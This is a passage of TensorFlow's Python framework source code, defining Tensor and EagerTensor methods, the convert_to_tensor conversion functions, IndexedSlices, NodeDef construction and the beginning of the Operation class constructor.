known, else None. Returns: Integer rank or None """ return self._shape.ndims def get_shape(self): """Alias of Tensor.shape.""" return self.shape def set_shape(self, shape): """Updates the shape of this tensor. This method can be called multiple times, and will merge the given `shape` with the current shape of this tensor. It can be used to provide additional information about the shape of this tensor that cannot be inferred from the graph alone. For example, this can be used to provide additional information about the shapes of images: ```python _, image_data = tf.TFRecordReader(...).read(...) image = tf.image.decode_png(image_data, channels=3) # The height and width dimensions of `image` are data dependent, and # cannot be computed without executing the op. print(image.shape) ==> TensorShape([Dimension(None), Dimension(None), Dimension(3)]) # We know that each image in this dataset is 28 x 28 pixels. image.set_shape([28, 28, 3]) print(image.shape) ==> TensorShape([Dimension(28), Dimension(28), Dimension(3)]) ``` Args: shape: A `TensorShape` representing the shape of this tensor. Raises: ValueError: If `shape` is not compatible with the current shape of this tensor. """ # TODO(skyewm): call C API self._shape = self._shape.merge_with(shape) @property def value_index(self): """The index of this tensor in the outputs of its `Operation`.""" return self._value_index def consumers(self): """Returns a list of `Operation`s that consume this tensor. Returns: A list of `Operation`s. """ return self._consumers def _add_consumer(self, consumer): """Add a consumer to this tensor. Args: consumer: an Operation. Raises: TypeError: if the consumer is not an Operation. """ if not isinstance(consumer, Operation): raise TypeError("Consumer must be an Operation: %s" % consumer) self._consumers.append(consumer) def _as_node_def_input(self): """Return a value to use for the NodeDef "input" attribute. The returned string can be used in a NodeDef "input" attribute to indicate that the NodeDef uses this Tensor as input. Raises: ValueError: if this Tensor's Operation does not have a name. Returns: a string. """ if not self._op.name: raise ValueError("Operation was not named: %s" % self._op) if self._value_index == 0: return self._op.name else: return "%s:%d" % (self._op.name, self._value_index) def _as_tf_output(self): assert self.op._c_op # pylint: disable=protected-access tf_output = c_api.TF_Output() tf_output.oper = self.op._c_op # pylint: disable=protected-access tf_output.index = self.value_index return tf_output def __str__(self): return "Tensor(\"%s\"%s%s%s)" % ( self.name, (", shape=%s" % self.get_shape()) if self.get_shape().ndims is not None else "", (", dtype=%s" % self._dtype.name) if self._dtype else "", (", device=%s" % self.device) if self.device else "") def __repr__(self): return "<tf.Tensor '%s' shape=%s dtype=%s>" % (self.name, self.get_shape(), self._dtype.name) def __hash__(self): # Necessary to support Python's collection membership operators return id(self) def __eq__(self, other): # Necessary to support Python's collection membership operators return id(self) == id(other) # NOTE(mrry): This enables the Tensor's overloaded "right" binary # operators to run when the left operand is an ndarray, because it # accords the Tensor class higher priority than an ndarray, or a # numpy matrix. # TODO(mrry): Convert this to using numpy's __numpy_ufunc__ # mechanism, which allows more control over how Tensors interact # with ndarrays. __array_priority__ = 100 @staticmethod def _override_operator(operator, func): _override_helper(Tensor, operator, func) def __bool__(self): """Dummy method to prevent a tensor from being used as a Python `bool`. This overload raises a `TypeError` when the user inadvertently treats a `Tensor` as a boolean (e.g. in an `if` statement). For example: ```python if tf.constant(True): # Will raise. # ... if tf.constant(5) < tf.constant(7): # Will raise. # ... ``` This disallows ambiguities between testing the Python value vs testing the dynamic condition of the `Tensor`. Raises: `TypeError`. """ raise TypeError("Using a `tf.Tensor` as a Python `bool` is not allowed. " "Use `if t is not None:` instead of `if t:` to test if a " "tensor is defined, and use TensorFlow ops such as " "tf.cond to execute subgraphs conditioned on the value of " "a tensor.") def __nonzero__(self): """Dummy method to prevent a tensor from being used as a Python `bool`. This is the Python 2.x counterpart to `__bool__()` above. Raises: `TypeError`. """ raise TypeError("Using a `tf.Tensor` as a Python `bool` is not allowed. " "Use `if t is not None:` instead of `if t:` to test if a " "tensor is defined, and use TensorFlow ops such as " "tf.cond to execute subgraphs conditioned on the value of " "a tensor.") def eval(self, feed_dict=None, session=None): """Evaluates this tensor in a `Session`. Calling this method will execute all preceding operations that produce the inputs needed for the operation that produces this tensor. *N.B.* Before invoking `Tensor.eval()`, its graph must have been launched in a session, and either a default session must be available, or `session` must be specified explicitly. Args: feed_dict: A dictionary that maps `Tensor` objects to feed values. See @{tf.Session.run} for a description of the valid feed values. session: (Optional.) The `Session` to be used to evaluate this tensor. If none, the default session will be used. Returns: A numpy array corresponding to the value of this tensor. """ return _eval_using_default_session(self, feed_dict, self.graph, session) def _dup(self): ret = copy.copy(self) ret._id = uid() # pylint: disable=protected-access return ret # TODO(agarwal): consider getting rid of this. class _EagerTensorBase(Tensor): """Base class for EagerTensor.""" @staticmethod def _delete_trace(tid): """Helper function to be called by __del__ of the subclass.""" tape.delete_trace(tid) @property def dtype(self): # Note: using the intern table directly here as this is # performance-sensitive in some models. return dtypes._INTERN_TABLE[self._datatype_enum()] # pylint: disable=protected-access def numpy(self): """Returns a numpy array with the same contents as the Tensor. TODO(ashankar,agarwal): Perhaps this should NOT reference the underlying buffer but instead always explicitly copy? Note that currently it may or may not copy based on whether the numpy data is properly aligned or not. Returns: A numpy array that may share memory with the Tensor object. Any changes to one may be reflected in the other. Raises: ValueError: if the type of this Tensor is not representable in numpy. """ if self.dtype == dtypes.resource: raise ValueError("Resource handles are not convertible to numpy.") return self.cpu()._numpy() # pylint: disable=protected-access # __int__ and __float__ may copy the tensor to CPU and # only work for scalars; values are cast as per numpy. def __int__(self): return int(self.numpy()) def __float__(self): return float(self.numpy()) def __array__(self): return np.array(self.numpy()) def _numpy(self): raise NotImplementedError() def __copy__(self): # Eager Tensors are immutable so it's safe to return themselves as a copy. return self def __deepcopy__(self, memo): # Eager Tensors are immutable so it's safe to return themselves as a copy. del memo return self def _datatype_enum(self): raise NotImplementedError() def _shape_tuple(self): """The shape of this Tensor, as a tuple. This is more performant than tuple(shape().as_list()) as it avoids two list and one object creation. Marked private for now as from an API perspective, it would be better to have a single performant way of getting a shape rather than exposing shape() and shape_tuple() (and heaven forbid, shape_list() etc. as well!). Punting on that for now, but ideally one would work things out and remove the need for this method. Returns: tuple with the shape. """ raise NotImplementedError() def _rank(self): """Integer rank of this Tensor. Unlike regular Tensors, the rank is always known for EagerTensors. This is more performant than len(self._shape_tuple()) Returns: Integer rank """ raise NotImplementedError() def _copy_to_device(self, context, device): # pylint: disable=redefined-outer-name raise NotImplementedError() def __str__(self): return "tf.Tensor(%s, shape=%s, dtype=%s)" % (numpy_text(self), self.shape, self.dtype.name) def __repr__(self): return "<tf.Tensor: id=%s, shape=%s, dtype=%s, numpy=%s>" % ( self._id, self.shape, self.dtype.name, numpy_text(self, is_repr=True)) @staticmethod def _override_operator(name, func): setattr(_EagerTensorBase, name, func) def _copy(self, ctx=None, device_name=None): """Copies tensor to dest device.""" # pylint: disable=protected-access # Creates a new tensor on the dest device. if ctx is None: ctx = context.context() if device_name is None: device_name = ctx.device_name # pylint: disable=protected-access try: new_tensor = self._copy_to_device(context=ctx._handle, device=device_name) except core._NotOkStatusException as e: six.raise_from(core._status_to_exception(e.code, e.message), None) if core.active_trace() is not None: core.active_trace().record_tensor("COPY", tensor_id(new_tensor), new_tensor.device, new_tensor.shape.num_elements()) # Record the copy on tape and define backprop copy as well. if not context.in_graph_mode(): self_device = self.device def grad_fun(dresult): return [dresult._copy(device_name=self_device)] tape.record_operation("_copy", [new_tensor], [self], grad_fun) return new_tensor # pylint: enable=protected-access def _dup(self): return self._copy(device_name=self.device) @property def shape(self): return tensor_shape.TensorShape(self._shape_tuple()) def get_shape(self): """Alias of Tensor.shape.""" return self.shape def _shape_as_list(self): """The shape of the tensor as a list.""" return list(self._shape_tuple()) def cpu(self): """A copy of this Tensor with contents backed by host memory.""" return self._copy(context.context(), "CPU:0") def gpu(self, gpu_index=0): """A copy of this Tensor with contents backed by memory on the GPU. Arguments: gpu_index: Identifies which GPU to place the contents on the returned Tensor in. Returns: A GPU-memory backed Tensor object initialized with the same contents as this Tensor. """ return self._copy(context.context(), "GPU:" + str(gpu_index)) def __bool__(self): if self._shape_tuple() != (): # pylint: disable=g-explicit-bool-comparison raise ValueError( "Non-scalar tensor %s cannot be converted to boolean." % repr(self)) if self.dtype != dtypes.bool: raise ValueError( "Non-boolean tensor %s cannot be converted to boolean." % repr(self)) return bool(self.cpu().numpy()) def __nonzero__(self): return self.__bool__() def set_shape(self, shape): if not self.shape.is_compatible_with(shape): raise ValueError( "EagerTensor's shape %s is not compatible with supplied shape %s" % (self.shape, shape)) # Methods not supported / implemented for Eager Tensors. @property def op(self): raise AttributeError("op not supported for Eager Tensors.") @property def graph(self): raise AttributeError("graph not supported for Eager Tensors.") @property def name(self): raise AttributeError("name not supported for Eager Tensors.") @property def value_index(self): raise AttributeError("value_index not supported for Eager Tensors.") def consumers(self): raise NotImplementedError("consumers not supported for Eager Tensors.") def _add_consumer(self, consumer): raise NotImplementedError("_add_consumer not supported for Eager Tensors.") def _as_node_def_input(self): raise NotImplementedError( "_as_node_def_input not supported for Eager Tensors.") def _as_tf_output(self): raise NotImplementedError("_as_tf_output not supported for Eager Tensors.") def eval(self, feed_dict=None, session=None): raise NotImplementedError("eval not supported for Eager Tensors.") # This call creates an EagerTensor class, as a subclass of _EagerTensorBase, and # registers it with the current module. EagerTensor = c_api.TFE_Py_InitEagerTensor(_EagerTensorBase) def _TensorTensorConversionFunction(t, dtype=None, name=None, as_ref=False): _ = name, as_ref if dtype and not dtype.is_compatible_with(t.dtype): raise ValueError( "Tensor conversion requested dtype %s for Tensor with dtype %s: %r" % (dtype.name, t.dtype.name, str(t))) return t _tensor_conversion_func_registry = { 0: [(Tensor, _TensorTensorConversionFunction)] } _tensor_conversion_func_cache = {} _tensor_conversion_func_lock = threading.Lock() register_dense_tensor_like_type(Tensor) def convert_to_tensor(value, dtype=None, name=None, preferred_dtype=None): """Converts the given `value` to a `Tensor`. This function converts Python objects of various types to `Tensor` objects. It accepts `Tensor` objects, numpy arrays, Python lists, and Python scalars. For example: ```python import numpy as np def my_func(arg): arg = tf.convert_to_tensor(arg, dtype=tf.float32) return tf.matmul(arg, arg) + arg # The following calls are equivalent. value_1 = my_func(tf.constant([[1.0, 2.0], [3.0, 4.0]])) value_2 = my_func([[1.0, 2.0], [3.0, 4.0]]) value_3 = my_func(np.array([[1.0, 2.0], [3.0, 4.0]], dtype=np.float32)) ``` This function can be useful when composing a new operation in Python (such as `my_func` in the example above). All standard Python op constructors apply this function to each of their Tensor-valued inputs, which allows those ops to accept numpy arrays, Python lists, and scalars in addition to `Tensor` objects. Args: value: An object whose type has a registered `Tensor` conversion function. dtype: Optional element type for the returned tensor. If missing, the type is inferred from the type of `value`. name: Optional name to use if a new `Tensor` is created. preferred_dtype: Optional element type for the returned tensor, used when dtype is None. In some cases, a caller may not have a dtype in mind when converting to a tensor, so preferred_dtype can be used as a soft preference. If the conversion to `preferred_dtype` is not possible, this argument has no effect. Returns: An `Output` based on `value`. Raises: TypeError: If no conversion function is registered for `value`. RuntimeError: If a registered conversion function returns an invalid value. """ return internal_convert_to_tensor( value=value, dtype=dtype, name=name, preferred_dtype=preferred_dtype, as_ref=False) def _error_prefix(name): return "" if name is None else "%s: " % name def internal_convert_to_tensor(value, dtype=None, name=None, as_ref=False, preferred_dtype=None, ctx=None): """Converts the given `value` to an `Tensor`. This function converts Python objects of various types to `Tensor` objects. It accepts `Tensor` objects, numpy arrays, Python lists, and Python scalars. For example: This function can be useful when composing a new operation in Python All standard Python op constructors apply this function to each of their Tensor-valued inputs, which allows those ops to accept numpy arrays, Python lists, and scalars in addition to `Tensor` objects. Args: value: An object whose type has a registered `Tensor` conversion function. dtype: Optional element type for the returned tensor. If missing, the type is inferred from the type of `value`. name: Optional name to use if a new `Tensor` is created. as_ref: True if we want the mutable view of Variables, if applicable. preferred_dtype: Optional element type for the returned tensor, used when dtype is None. In some cases, a caller may not have a dtype in mind when converting to a tensor, so preferred_dtype can be used as a soft preference. If the conversion to `preferred_dtype` is not possible, this argument has no effect. ctx: Optional: The value of context.context(). Returns: A `Tensor` based on `value`. Raises: TypeError: If no conversion function is registered for `value`. RuntimeError: If a registered conversion function returns an invalid value. """ if ctx is None: ctx = context.context() if ctx.in_eager_mode(): # Fast path for EagerTensors that don't need any conversion. if isinstance(value, EagerTensor): # Note that we don't check that value's dtype matches the dtype # argument. We exepct that the C runtime will do that checking # when we execute the kernel. return value if dtype is not None: dtype = dtypes.as_dtype(dtype) unwrapped_type = type(value) conversion_func_list = _tensor_conversion_func_cache.get(unwrapped_type, None) if conversion_func_list is None: with _tensor_conversion_func_lock: conversion_func_list = [] for _, funcs_at_priority in sorted( _tensor_conversion_func_registry.items()): for base_type, conversion_func in funcs_at_priority: if isinstance(value, base_type): conversion_func_list.append((base_type, conversion_func)) _tensor_conversion_func_cache[unwrapped_type] = conversion_func_list for base_type, conversion_func in conversion_func_list: # If dtype is None but preferred_dtype is not None, we try to # cast to preferred_dtype first. ret = None if dtype is None and preferred_dtype is not None: try: ret = conversion_func( value, dtype=preferred_dtype, name=name, as_ref=as_ref) except (TypeError, ValueError, errors.UnimplementedError, errors.InvalidArgumentError): # Could not coerce the conversion to use the preferred dtype. ret = None if ret is not None and ret is not NotImplemented: if (ret.dtype.base_dtype != dtypes.as_dtype(preferred_dtype).base_dtype): raise TypeError("convert_to_tensor did not convert to " "the preferred dtype: %s vs %s " % (ret.dtype.base_dtype, dtypes.as_dtype(preferred_dtype).base_dtype)) if ret is None: ret = conversion_func(value, dtype=dtype, name=name, as_ref=as_ref) if ret is NotImplemented: continue if not isinstance(ret, Tensor): raise RuntimeError( "%sConversion function %r for type %s returned non-Tensor: %r" % (_error_prefix(name), conversion_func, base_type, ret)) if dtype and not dtype.is_compatible_with(ret.dtype): raise RuntimeError( "%sConversion function %r for type %s returned incompatible " "dtype: requested = %s, actual = %s" % (_error_prefix(name), conversion_func, base_type, dtype.name, ret.dtype.name)) return ret raise TypeError("%sCannot convert %r with type %s to Tensor: " "no conversion function registered." % (_error_prefix(name), value, unwrapped_type)) def internal_convert_n_to_tensor(values, dtype=None, name=None, as_ref=False, preferred_dtype=None, ctx=None): """Converts `values` to a list of `Tensor` objects. Args: values: A list of objects that can be consumed by `tf.convert_to_tensor()`. dtype: (Optional.) The required `DType` of the returned `Tensor` objects. name: (Optional.) A name prefix to used when a new `Tensor` is created, in which case element `i` will be given the name `name + '_' + i`. as_ref: True if the caller wants the results as ref tensors. preferred_dtype: Optional element type for the returned tensors, used when dtype is None. In some cases, a caller may not have a dtype in mind when converting to a tensor, so preferred_dtype can be used as a soft preference. If the conversion to `preferred_dtype` is not possible, this argument has no effect. ctx: The value of context.context(). Returns: A list of `Tensor` and/or `IndexedSlices` objects. Raises: TypeError: If no conversion function is registered for an element in `values`. RuntimeError: If a registered conversion function returns an invalid value. """ if not isinstance(values, collections.Sequence): raise TypeError("values must be a list.") ret = [] if ctx is None: ctx = context.context() for i, value in enumerate(values): n = None if name is None else "%s_%d" % (name, i) ret.append( internal_convert_to_tensor( value, dtype=dtype, name=n, as_ref=as_ref, preferred_dtype=preferred_dtype, ctx=ctx)) return ret def convert_n_to_tensor(values, dtype=None, name=None, preferred_dtype=None): """Converts `values` to a list of `Tensor` objects. Args: values: A list of objects that can be consumed by `tf.convert_to_tensor()`. dtype: (Optional.) The required `DType` of the returned `Tensor` objects. name: (Optional.) A name prefix to used when a new `Tensor` is created, in which case element `i` will be given the name `name + '_' + i`. preferred_dtype: Optional element type for the returned tensors, used when dtype is None. In some cases, a caller may not have a dtype in mind when converting to a tensor, so preferred_dtype can be used as a soft preference. If the conversion to `preferred_dtype` is not possible, this argument has no effect. Returns: A list of `Tensor` and/or `IndexedSlices` objects. Raises: TypeError: If no conversion function is registered for an element in `values`. RuntimeError: If a registered conversion function returns an invalid value. """ return internal_convert_n_to_tensor( values=values, dtype=dtype, name=name, preferred_dtype=preferred_dtype, as_ref=False) def convert_to_tensor_or_indexed_slices(value, dtype=None, name=None): """Converts the given object to a `Tensor` or an `IndexedSlices`. If `value` is an `IndexedSlices` or `SparseTensor` it is returned unmodified. Otherwise, it is converted to a `Tensor` using `convert_to_tensor()`. Args: value: An `IndexedSlices`, `SparseTensor`, or an object that can be consumed by `convert_to_tensor()`. dtype: (Optional.) The required `DType` of the returned `Tensor` or `IndexedSlices`. name: (Optional.) A name to use if a new `Tensor` is created. Returns: An `Tensor`, `IndexedSlices`, or `SparseTensor` based on `value`. Raises: ValueError: If `dtype` does not match the element type of `value`. """ return internal_convert_to_tensor_or_indexed_slices( value=value, dtype=dtype, name=name, as_ref=False) def internal_convert_to_tensor_or_indexed_slices(value, dtype=None, name=None, as_ref=False): """Converts the given object to an `Tensor` or an `IndexedSlices`. If `value` is an `IndexedSlices` or `SparseTensor` it is returned unmodified. Otherwise, it is converted to a `Tensor` using `convert_to_tensor()`. Args: value: An `IndexedSlices`, `SparseTensor`, or an object that can be consumed by `convert_to_tensor()`. dtype: (Optional.) The required `DType` of the returned `Tensor` or `IndexedSlices`. name: (Optional.) A name to use if a new `Tensor` is created. as_ref: True if the caller wants the results as ref tensors. Returns: An `Tensor`, `IndexedSlices`, or `SparseTensor` based on `value`. Raises: ValueError: If `dtype` does not match the element type of `value`. """ if isinstance(value, _TensorLike): if dtype and not dtypes.as_dtype(dtype).is_compatible_with(value.dtype): raise ValueError( "Tensor conversion requested dtype %s for Tensor with dtype %s: %r" % (dtypes.as_dtype(dtype).name, value.dtype.name, str(value))) return value else: return internal_convert_to_tensor( value, dtype=dtype, name=name, as_ref=as_ref) def internal_convert_n_to_tensor_or_indexed_slices(values, dtype=None, name=None, as_ref=False): """Converts `values` to a list of `Tensor` or `IndexedSlices` objects. Any `IndexedSlices` or `SparseTensor` objects in `values` are returned unmodified. Args: values: A list of `None`, `IndexedSlices`, `SparseTensor`, or objects that can be consumed by `convert_to_tensor()`. dtype: (Optional.) The required `DType` of the returned `Tensor` `IndexedSlices`. name: (Optional.) A name prefix to used when a new `Tensor` is created, in which case element `i` will be given the name `name + '_' + i`. as_ref: True if the caller wants the results as ref tensors. Returns: A list of `Tensor`, `IndexedSlices`, and/or `SparseTensor` objects. Raises: TypeError: If no conversion function is registered for an element in `values`. RuntimeError: If a registered conversion function returns an invalid value. """ if not isinstance(values, collections.Sequence): raise TypeError("values must be a list.") ret = [] for i, value in enumerate(values): if value is None: ret.append(value) else: n = None if name is None else "%s_%d" % (name, i) ret.append( internal_convert_to_tensor_or_indexed_slices( value, dtype=dtype, name=n, as_ref=as_ref)) return ret def convert_n_to_tensor_or_indexed_slices(values, dtype=None, name=None): """Converts `values` to a list of `Output` or `IndexedSlices` objects. Any `IndexedSlices` or `SparseTensor` objects in `values` are returned unmodified. Args: values: A list of `None`, `IndexedSlices`, `SparseTensor`, or objects that can be consumed by `convert_to_tensor()`. dtype: (Optional.) The required `DType` of the returned `Tensor` `IndexedSlices`. name: (Optional.) A name prefix to used when a new `Tensor` is created, in which case element `i` will be given the name `name + '_' + i`. Returns: A list of `Tensor`, `IndexedSlices`, and/or `SparseTensor` objects. Raises: TypeError: If no conversion function is registered for an element in `values`. RuntimeError: If a registered conversion function returns an invalid value. """ return internal_convert_n_to_tensor_or_indexed_slices( values=values, dtype=dtype, name=name, as_ref=False) # TODO(josh11b): Add ctx argument to conversion_func() signature. def register_tensor_conversion_function(base_type, conversion_func, priority=100): """Registers a function for converting objects of `base_type` to `Tensor`. The conversion function must have the following signature: ```python def conversion_func(value, dtype=None, name=None, as_ref=False): # ... ``` It must return a `Tensor` with the given `dtype` if specified. If the conversion function creates a new `Tensor`, it should use the given `name` if specified. All exceptions will be propagated to the caller. The conversion function may return `NotImplemented` for some inputs. In this case, the conversion process will continue to try subsequent conversion functions. If `as_ref` is true, the function must return a `Tensor` reference, such as a `Variable`. NOTE: The conversion functions will execute in order of priority, followed by order of registration. To ensure that a conversion function `F` runs before another conversion function `G`, ensure that `F` is registered with a smaller priority than `G`. Args: base_type: The base type or tuple of base types for all objects that `conversion_func` accepts. conversion_func: A function that converts instances of `base_type` to `Tensor`. priority: Optional integer that indicates the priority for applying this conversion function. Conversion functions with smaller priority values run earlier than conversion functions with larger priority values. Defaults to 100. Raises: TypeError: If the arguments do not have the appropriate type. """ global _tensor_conversion_func_cache with _tensor_conversion_func_lock: if not (isinstance(base_type, type) or (isinstance(base_type, tuple) and all(isinstance(x, type) for x in base_type))): raise TypeError("base_type must be a type or a tuple of types.") if not callable(conversion_func): raise TypeError("conversion_func must be callable.") try: funcs_at_priority = _tensor_conversion_func_registry[priority] except KeyError: funcs_at_priority = [] _tensor_conversion_func_registry[priority] = funcs_at_priority funcs_at_priority.append((base_type, conversion_func)) _tensor_conversion_func_cache = {} class IndexedSlices(_TensorLike): """A sparse representation of a set of tensor slices at given indices. This class is a simple wrapper for a pair of `Tensor` objects: * `values`: A `Tensor` of any dtype with shape `[D0, D1, ..., Dn]`. * `indices`: A 1-D integer `Tensor` with shape `[D0]`. An `IndexedSlices` is typically used to represent a subset of a larger tensor `dense` of shape `[LARGE0, D1, .. , DN]` where `LARGE0 >> D0`. The values in `indices` are the indices in the first dimension of the slices that have been extracted from the larger tensor. The dense tensor `dense` represented by an `IndexedSlices` `slices` has ```python dense[slices.indices[i], :, :, :, ...] = slices.values[i, :, :, :, ...] ``` The `IndexedSlices` class is used principally in the definition of gradients for operations that have sparse gradients (e.g. @{tf.gather}). Contrast this representation with @{tf.SparseTensor}, which uses multi-dimensional indices and scalar values. """ def __init__(self, values, indices, dense_shape=None): """Creates an `IndexedSlices`.""" _get_graph_from_inputs([values, indices, dense_shape]) self._values = values self._indices = indices self._dense_shape = dense_shape @property def values(self): """A `Tensor` containing the values of the slices.""" return self._values @property def indices(self): """A 1-D `Tensor` containing the indices of the slices.""" return self._indices @property def dense_shape(self): """A 1-D `Tensor` containing the shape of the corresponding dense tensor.""" return self._dense_shape @property def name(self): """The name of this `IndexedSlices`.""" return self.values.name @property def device(self): """The name of the device on which `values` will be produced, or `None`.""" return self.values.device @property def op(self): """The `Operation` that produces `values` as an output.""" return self.values.op @property def dtype(self): """The `DType` of elements in this tensor.""" return self.values.dtype @property def graph(self): """The `Graph` that contains the values, indices, and shape tensors.""" return self._values.graph def __str__(self): return "IndexedSlices(indices=%s, values=%s%s)" % ( self._indices, self._values, (", dense_shape=%s" % self._dense_shape) if self._dense_shape is not None else "") def __neg__(self): return IndexedSlices(-self.values, self.indices, self.dense_shape) IndexedSlicesValue = collections.namedtuple( "IndexedSlicesValue", ["values", "indices", "dense_shape"]) def _device_string(dev_spec): if isinstance(dev_spec, pydev.DeviceSpec): return dev_spec.to_string() else: return dev_spec def _NodeDef(op_type, name, device=None, attrs=None): # pylint: disable=redefined-outer-name """Create a NodeDef proto. Args: op_type: Value for the "op" attribute of the NodeDef proto. name: Value for the "name" attribute of the NodeDef proto. device: string, device, or function from NodeDef to string. Value for the "device" attribute of the NodeDef proto. attrs: Optional dictionary where the key is the attribute name (a string) and the value is the respective "attr" attribute of the NodeDef proto (an AttrValue). Returns: A node_def_pb2.NodeDef protocol buffer. """ node_def = node_def_pb2.NodeDef() node_def.op = compat.as_bytes(op_type) node_def.name = compat.as_bytes(name) if attrs is not None: for k, v in six.iteritems(attrs): node_def.attr[k].CopyFrom(v) if device is not None: if callable(device): node_def.device = device(node_def) else: node_def.device = _device_string(device) return node_def # Copied from core/framework/node_def_util.cc # TODO(mrry,josh11b): Consolidate this validation in C++ code. _VALID_OP_NAME_REGEX = re.compile("^[A-Za-z0-9.][A-Za-z0-9_.\\-/]*$") _VALID_SCOPE_NAME_REGEX = re.compile("^[A-Za-z0-9_.\\-/]*$") class Operation(object): """Represents a graph node that performs computation on tensors. An `Operation` is a node in a TensorFlow `Graph` that takes zero or more `Tensor` objects as input, and produces zero or more `Tensor` objects as output. Objects of type `Operation` are created by calling a Python op constructor (such as @{tf.matmul}) or @{tf.Graph.create_op}. For example `c = tf.matmul(a, b)` creates an `Operation` of type "MatMul" that takes tensors `a` and `b` as input, and produces `c` as output. After the graph has been launched in a session, an `Operation` can be executed by passing it to @{tf.Session.run}. `op.run()` is a shortcut for calling `tf.get_default_session().run(op)`. """ def __init__(self, node_def, g, inputs=None, output_types=None, control_inputs=None, input_types=None, original_op=None, op_def=None): r"""Creates an `Operation`. NOTE: This constructor validates the name of the `Operation` (passed as `node_def.name`). Valid `Operation` names match the following regular expression: [A-Za-z0-9.][A-Za-z0-9_.\\-/]* Args: node_def: `node_def_pb2.NodeDef`. `NodeDef` for the `Operation`. Used for attributes of `node_def_pb2.NodeDef`, typically `name`, `op`, and `device`. The `input` attribute is irrelevant here as it will be computed when generating the model. g: `Graph`. The parent graph. inputs: list of `Tensor` objects. The inputs to this `Operation`. output_types: list of `DType` objects. List of the types of the `Tensors` computed by this operation. The length of this list indicates the number of output endpoints of the `Operation`. control_inputs: list of operations or tensors from which to have a control dependency. input_types: List of `DType` objects representing the types of the tensors accepted by the `Operation`. By default uses `[x.dtype.base_dtype for x in inputs]`. Operations that expect reference-typed inputs must specify these explicitly. original_op: Optional. Used to associate the new `Operation` with an existing `Operation` (for example, a replica with the op that was replicated). op_def: Optional. The `op_def_pb2.OpDef` proto that describes the op type that this `Operation` represents. Raises: TypeError: if control inputs are not Operations or Tensors, or if `node_def` is not a `NodeDef`, or if `g` is not a `Graph`, or if `inputs` are not tensors, or if `inputs` and `input_types` are incompatible. ValueError: if the `node_def` name is not valid. """ if not isinstance(node_def, node_def_pb2.NodeDef): raise TypeError("node_def needs to be a NodeDef: %s" % node_def) if node_def.ByteSize() >= (1 << 31) or node_def.ByteSize() < 0: raise ValueError( "Cannot create a tensor proto whose content is larger than 2GB.") if not _VALID_OP_NAME_REGEX.match(node_def.name): raise ValueError("'%s' is not a valid node name" % node_def.name) if not isinstance(g, Graph): raise TypeError("g needs to be a Graph: %s" % g) self._node_def = copy.deepcopy(node_def) self._graph = g if inputs is None: inputs = [] elif not isinstance(inputs, list): raise TypeError("inputs needs to be a list of Tensors: %s" % inputs) self._inputs = list(inputs) # Defensive copy. for a in self._inputs: if not isinstance(a, Tensor): raise TypeError("input needs to be a Tensor: %s" % a) # Mark that we consume the inputs. a._add_consumer(self) # pylint: disable=protected-access if output_types is None: output_types = [] self._output_types_val = output_types self._outputs = [ Tensor(self, i, output_type) for i, output_type in enumerate(output_types) ] if input_types is None: input_types = [i.dtype.base_dtype for i in self._inputs] else: if not all( x.is_compatible_with(i.dtype) for i, x in zip(self._inputs, input_types)): raise TypeError("In op '%s', input types (%s) are not compatible " "with expected types (%s)" % (self.node_def.name, [i.dtype for i in self._inputs], input_types)) self._input_types_val = input_types # Build the list of control inputs. self._control_inputs = [] if control_inputs: for c in control_inputs: c_op = None if isinstance(c, Operation): c_op = c elif isinstance(c, (Tensor, IndexedSlices)): c_op = c.op else: raise TypeError("Control input must be an Operation, " "a Tensor, or IndexedSlices: %s" % c) self._control_inputs.append(c_op) self._original_op = original_op self._op_def = op_def self._traceback = self._graph._extract_stack() # pylint: disable=protected-access # Define self._c_op before calling self._control_flow_context.AddOp(), since # that will call methods on this op that check if self._c_op is set. self._c_op = None # Add this op to the current control flow context: self._control_flow_context = g._get_control_flow_context() # pylint: disable=protected-access if self._control_flow_context is not None: # TODO(skyewm): consider refactoring this to call self._create_c_op() # first. This would require updating the TF_Operation's ID (see the # comment and self._id_value update below). The disadvantage of calling # AddOp() first is that we need to maintain Operation state that is # accessed by AddOp() in Python, e.g. the input Tensors. self._control_flow_context.AddOp(self) # NOTE(keveman): Control flow context's AddOp could be creating new ops and # setting op.inputs[index] = new_op. Thus the new ops' id could be larger # than this op's id even though this op depend on them. Therefore, delaying # assigning id to this op until all ops this could be dependent on are # created. self._id_value = self._graph._next_id() # pylint: disable=protected-access self._recompute_node_def() if self._graph._c_graph: # pylint: disable=protected-access if self._op_def: # TODO(skyewm): op_def_library.apply_op() flattens the incoming # inputs. Refactor so we don't have to do this here. grouped_inputs = self._reconstruct_sequence_inputs( self._op_def, self._inputs, self._node_def.attr) else: # If no OpDef is specified, assume all inputs are scalar. grouped_inputs = self._inputs self._c_op = self._create_c_op(self._graph, self._node_def, grouped_inputs, self._control_inputs) def _create_c_op(self, graph, node_def, inputs, control_inputs): """Creates a TF_Operation. Args: graph: a `Graph`. node_def: `node_def_pb2.NodeDef` for the operation to create. inputs: A list of `Tensor`s (corresponding to scalar inputs) and lists of `Tensor`s (corresponding to sequence inputs, e.g. "int64 * N", "list(int64)"). The length of the list should be equal to the number of inputs specified by this operation's op def. control_inputs: A list of `Operation`s to set as control dependencies. Returns: A wrapped TF_Operation*. """ # pylint: disable=protected-access op_desc = c_api.TF_NewOperation(graph._c_graph, compat.as_str(node_def.op), compat.as_str(node_def.name)) # Add inputs for op_input in inputs: if isinstance(op_input, (list, tuple)): c_api.TF_AddInputList(op_desc, [t._as_tf_output() for t in op_input]) else: c_api.TF_AddInput(op_desc, op_input._as_tf_output()) # Add control inputs for control_input in control_inputs: c_api.TF_AddControlInput(op_desc, control_input._c_op) # pylint: enable=protected-access # Add attrs for name, attr_value in node_def.attr.items(): serialized = attr_value.SerializeToString() # TODO(skyewm): this creates and deletes a new TF_Status for every attr. # It might be worth creating a convenient way to re-use the same status. with errors.raise_exception_on_not_ok_status() as status: c_api.TF_SetAttrValueProto(op_desc, compat.as_str(name), serialized, status) with errors.raise_exception_on_not_ok_status() as status: c_op = c_api.TF_FinishOperation(op_desc, status) return c_op def _reconstruct_sequence_inputs(self, op_def, inputs, attrs): """Regroups a flat list of input tensors into scalar and sequence inputs. Args: op_def: The `op_def_pb2.OpDef` (for knowing the input types) inputs: a list of input `Tensor`s to the op. attrs: mapping from attr name to `attr_value_pb2.AttrValue` (these define how long each sequence is) Returns: A list of `Tensor`s (corresponding to scalar inputs) and lists of `Tensor`s (corresponding to sequence inputs). """ grouped_inputs = [] i = 0 for input_arg in op_def.input_arg: if input_arg.number_attr: input_len = attrs[input_arg.number_attr].i is_sequence = True elif input_arg.type_list_attr: input_len = len(attrs[input_arg.type_list_attr].list.type) is_sequence = True else: input_len = 1 